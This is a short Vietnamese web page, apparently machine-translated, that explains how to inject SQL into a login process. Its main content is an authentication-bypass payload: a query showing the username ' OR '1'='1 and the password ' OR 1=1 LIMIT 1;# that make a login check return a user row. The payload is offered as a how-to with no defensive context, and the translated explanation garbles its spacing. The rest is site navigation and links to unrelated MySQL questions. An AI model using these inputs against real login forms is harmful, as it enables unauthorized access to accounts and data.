Mysql
 sql >> Cơ Sở Dữ Liệu >  >> RDS >> Mysql

cách đưa sql vào quá trình đăng nhập

Bắt đầu với truy vấn mục tiêu:

SELECT   *
FROM     users
WHERE    username = '' OR '1'='1' 
AND      password = '' OR 1=1 LIMIT 1;#'

Chúng tôi nhận được tên người dùng là 'OR' 1 '=' 1 và mật khẩu là 'OR 1 =1 LIMIT 1; #



  1. Database
    2.   
  2. Mysql
    3.   
  3. Oracle
    4.   
  4. Sqlserver
    5.   
  5. PostgreSQL
    6.   
  6. Access
    7.   
  7. SQLite
    8.   
  8. MariaDB

  1. Tôi dường như không thể ngăn đầu vào tên trùng lặp

  2. Giới hạn kết quả từ bảng đã tham gia thành một hàng

  3. Truy vấn con MySQL - Chỉ tìm bản ghi đầu tiên trong THAM GIA TRÁI

  4. Mã hóa ký tự Hy Lạp hoạt động trong HTML nhưng không hoạt động trong PHP

  5. Các phương pháp hay nhất để lưu trữ thông tin ngân hàng trong cơ sở dữ liệu